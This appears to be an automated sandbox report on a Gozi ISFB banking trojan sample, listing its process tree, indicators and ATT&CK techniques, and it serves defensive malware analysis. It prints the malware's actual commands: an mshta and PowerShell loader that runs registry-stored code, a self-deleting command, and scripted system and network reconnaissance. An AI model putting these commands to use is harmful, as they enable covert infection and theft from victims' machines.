PID 1272 wrote to memory of 1980	1272	Explorer.EXE	83
PID 1272 wrote to memory of 324	1272	Explorer.EXE	85
PID 1272 wrote to memory of 324	1272	Explorer.EXE	85
PID 1272 wrote to memory of 324	1272	Explorer.EXE	85

Loads dropped DLL 1 IoCs

pid	Process
1280	regsvr32.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1700	iexplore.exe
1700	iexplore.exe
1700	iexplore.exe
1272	Explorer.EXE

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2012	PING.EXE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
PID:1272
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\presentation_p1f.js
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\System32\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\\FAwOkFRO.txt
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1224
  - - C:\Windows\SysWOW64\regsvr32.exe
      C:\Users\Admin\AppData\Local\Temp\\FAwOkFRO.txt
      4⤵
      Loads dropped DLL
      PID:1280
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\4F9B8A74-6250-5914-E4F3-B69D58D74A21\\DmdlDump'));if(!window.flag)close()</script>"
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\4F9B8A74-6250-5914-E4F3-B69D58D74A21").Certxva2))
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: MapViewOfSection
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetThreadContext
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:1204
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gti4bvfk\gti4bvfk.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1360
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA350.tmp" "c:\Users\Admin\AppData\Local\Temp\gti4bvfk\CSCE409794B114745488AE5C2988927EDD3.TMP"
        5⤵
        
        PID:1128
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vmc4f4zi\vmc4f4zi.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1300
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA3EC.tmp" "c:\Users\Admin\AppData\Local\Temp\vmc4f4zi\CSC7937BD7D42D4BF0B6C9FBFF42195A1F.TMP"
        5⤵
        
        PID:1572
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\FAwOkFRO.txt"
  2⤵
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1072
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Runs ping.exe
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\A3D4.bi1"
  2⤵
  PID:1980
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:2032
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\A1D4.bi1"
  2⤵
  PID:1968
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:1392
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A1D4.bi1"
  2⤵
  PID:324
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D4.bi1"
  2⤵
  PID:600
- C:\Windows\system32\cmd.exe
  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:1360
- - C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    3⤵
    - Gathers system information
    PID:1572
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:1736
- C:\Windows\system32\cmd.exe
  cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:1388
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:1092
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:1968
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:2004
- - C:\Windows\system32\nslookup.exe
    nslookup 127.0.0.1
    3⤵
    PID:1560
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:812
- C:\Windows\system32\cmd.exe
  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:1344
- - C:\Windows\system32\tasklist.exe
    tasklist.exe /SVC
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Enumerates processes with tasklist
    PID:1504
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:1164
- C:\Windows\system32\cmd.exe
  cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:1496
- - C:\Windows\system32\driverquery.exe
    driverquery.exe
    3⤵
    PID:1756
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:1708
- C:\Windows\system32\cmd.exe
  cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:1492
- - C:\Windows\system32\reg.exe
    reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
    3⤵
    - Checks for installed software on the system
    PID:1208
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:1980
- C:\Windows\system32\cmd.exe
  cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\6F44.bin1 > C:\Users\Admin\AppData\Local\Temp\6F44.bin & del C:\Users\Admin\AppData\Local\Temp\6F44.bin1"
  2⤵
  PID:324

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
PID:1700
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1700 CREDAT:275457 /prefetch:2
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:1764
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1700 CREDAT:406535 /prefetch:2
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:1532

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1072-20-0x0000000001C40000-0x0000000001CF1000-memory.dmp

Filesize
708KB

Download
memory/1072-17-0x0000000000210000-0x0000000000211000-memory.dmp

Filesize
4KB

Download
memory/1204-14-0x000000001C220000-0x000000001C2D1000-memory.dmp

Filesize
708KB

Download
memory/1272-18-0x0000000006500000-0x00000000065B1000-memory.dmp

Filesize
708KB

Download
memory/1272-16-0x0000000007BA0000-0x0000000007C51000-memory.dmp

Filesize
708KB

Download
memory/1272-13-0x0000000002700000-0x0000000002701000-memory.dmp

Filesize
4KB

Download
memory/1700-15-0x0000000002E60000-0x0000000002E61000-memory.dmp

Filesize
4KB

Download
memory/2012-19-0x0000000000100000-0x0000000000101000-memory.dmp

Filesize
4KB

Download
memory/2024-0-0x00000000028C0000-0x00000000028C4000-memory.dmp

Filesize
16KB

Download